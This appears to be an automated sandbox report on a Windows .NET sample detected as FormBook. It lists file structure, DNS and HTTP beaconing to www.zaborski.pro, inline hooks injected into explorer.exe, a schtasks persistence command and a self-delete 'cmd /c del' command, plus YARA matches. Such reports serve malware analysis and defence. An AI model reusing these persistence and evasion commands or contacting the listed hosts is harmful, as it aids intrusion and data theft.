                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10e964 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x110000 | 0x19430 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                        Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x10c9c4 | 0x10ca00 | False | 0.649662633783 | data | 7.02347259021 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x110000 | 0x19430 | 0x19600 | False | 0.391664100985 | data | 4.29516630678 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x12a000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x1101f0 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x120a18 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295 | |
RT_ICON | 0x124c40 | 0x25a8 | data | |
RT_ICON | 0x1271e8 | 0x10a8 | data | |
RT_ICON | 0x128290 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_GROUP_ICON | 0x1286f8 | 0x4c | data | |
RT_VERSION | 0x128744 | 0x33c | data | |
RT_MANIFEST | 0x128a80 | 0x9b0 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators | |

                                        Imports

DLL | Import
mscoree.dll | _CorExeMain

                                        Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright F@Soft
Assembly Version | 1.0.6.2
InternalName | DirectoryStri.exe
FileVersion | 1.0.6.0
CompanyName | F@Soft
LegalTrademarks |
Comments |
ProductName | Darwin AW
ProductVersion | 1.0.6.0
FileDescription | Darwin AW
OriginalFilename | DirectoryStri.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2021 14:53:50.245162010 CEST | 49852 | 80 | 192.168.2.4 | 91.237.52.145
Sep 27, 2021 14:53:53.252325058 CEST | 49852 | 80 | 192.168.2.4 | 91.237.52.145
Sep 27, 2021 14:53:53.295085907 CEST | 80 | 49852 | 91.237.52.145 | 192.168.2.4
Sep 27, 2021 14:53:53.295651913 CEST | 49852 | 80 | 192.168.2.4 | 91.237.52.145
Sep 27, 2021 14:53:53.295681000 CEST | 49852 | 80 | 192.168.2.4 | 91.237.52.145
Sep 27, 2021 14:53:53.338730097 CEST | 80 | 49852 | 91.237.52.145 | 192.168.2.4
Sep 27, 2021 14:53:53.338773966 CEST | 80 | 49852 | 91.237.52.145 | 192.168.2.4
Sep 27, 2021 14:53:53.338789940 CEST | 80 | 49852 | 91.237.52.145 | 192.168.2.4
Sep 27, 2021 14:53:53.339176893 CEST | 49852 | 80 | 192.168.2.4 | 91.237.52.145
Sep 27, 2021 14:53:53.367613077 CEST | 49852 | 80 | 192.168.2.4 | 91.237.52.145
Sep 27, 2021 14:53:53.410270929 CEST | 80 | 49852 | 91.237.52.145 | 192.168.2.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2021 14:51:54.994518995 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:51:55.025773048 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:52:27.672146082 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:52:27.705750942 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:52:47.060364008 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:52:47.078507900 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:52:47.148010015 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:52:47.210721016 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:52:47.793194056 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:52:47.869272947 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:52:48.238492012 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:52:48.273530960 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:52:48.651422977 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:52:48.665143013 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:52:49.097857952 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:52:49.161163092 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:52:49.975158930 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:52:49.989016056 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:52:50.565321922 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:52:50.578814030 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:52:51.157911062 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:52:51.241772890 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:52:52.336307049 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:52:52.349224091 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:52:53.496551991 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:52:53.509587049 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:52:54.098185062 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:52:54.111202955 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:53:06.958460093 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:53:06.982157946 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:53:39.562196970 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:53:39.595563889 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:53:40.552614927 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:53:40.587773085 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:53:50.157510996 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:53:50.237306118 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:54:10.915993929 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:54:10.945149899 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 27, 2021 14:53:50.157510996 CEST | 192.168.2.4 | 8.8.8.8 | 0xd0c6 | Standard query (0) | www.zaborski.pro | A (IP address) | IN (0x0001)
Sep 27, 2021 14:54:10.915993929 CEST | 192.168.2.4 | 8.8.8.8 | 0xf8fc | Standard query (0) | www.desireezzplus.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 27, 2021 14:53:50.237306118 CEST | 8.8.8.8 | 192.168.2.4 | 0xd0c6 | No error (0) | www.zaborski.pro | - | 91.237.52.145 | A (IP address) | IN (0x0001)
Sep 27, 2021 14:54:10.945149899 CEST | 8.8.8.8 | 192.168.2.4 | 0xf8fc | No error (0) | www.desireezzplus.com | desireezzplus.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 14:54:10.945149899 CEST | 8.8.8.8 | 192.168.2.4 | 0xf8fc | No error (0) | desireezzplus.com | - | 66.254.114.234 | A (IP address) | IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.zaborski.pro

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49852 | 91.237.52.145 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 14:53:53.295681000 CEST | 5656 | OUT | GET /gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RBnaKwy&m2M0a=aZq8yroxIb HTTP/1.1
Host: www.zaborski.pro
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 27, 2021 14:53:53.338773966 CEST | 5657 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
content-type: text/html
content-length: 707
date: Mon, 27 Sep 2021 12:53:53 GMT
server: LiteSpeed
location: https://www.zaborski.pro/gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RBnaKwy&m2M0a=aZq8yroxIb
vary: User-Agent,Accept-Encoding
Data Raw: (hex dump of the response body omitted; the decoded text follows under Data Ascii)
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                        Code Manipulations

                                        User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x83 0x3E 0xE1
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8B 0xBE 0xE1
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8B 0xBE 0xE1
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x83 0x3E 0xE1

                                        Statistics

                                        Behavior

                                        System Behavior

                                        General

Start time: 14:52:00
Start date: 27/09/2021
Path: C:\Users\user\Desktop\456yqMyHvT.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\456yqMyHvT.exe'
Imagebase: 0xd20000
File size: 1205248 bytes
MD5 hash: 001122F11AE95A3C00EB3E76541BC264
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

                                        General

Start time: 14:52:20
Start date: 27/09/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\dWAzsHjHs' /XML 'C:\Users\user\AppData\Local\Temp\tmp9071.tmp'
Imagebase: 0xc0000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                        General

Start time: 14:52:21
Start date: 27/09/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                        General

Start time: 14:52:21
Start date: 27/09/2021
Path: C:\Users\user\Desktop\456yqMyHvT.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\456yqMyHvT.exe
Imagebase: 0x6a0000
File size: 1205248 bytes
MD5 hash: 001122F11AE95A3C00EB3E76541BC264
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                        General

Start time: 14:52:22
Start date: 27/09/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff6fee60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation: high

                                        General

Start time: 14:53:02
Start date: 27/09/2021
Path: C:\Windows\SysWOW64\WWAHost.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WWAHost.exe
Imagebase: 0x1190000
File size: 829856 bytes
MD5 hash: 370C260333EB3149EF4E49C8F64652A0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

                                        General

Start time: 14:53:07
Start date: 27/09/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\456yqMyHvT.exe'
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                        General

Start time: 14:53:07
Start date: 27/09/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                        Disassembly

                                        Code Analysis
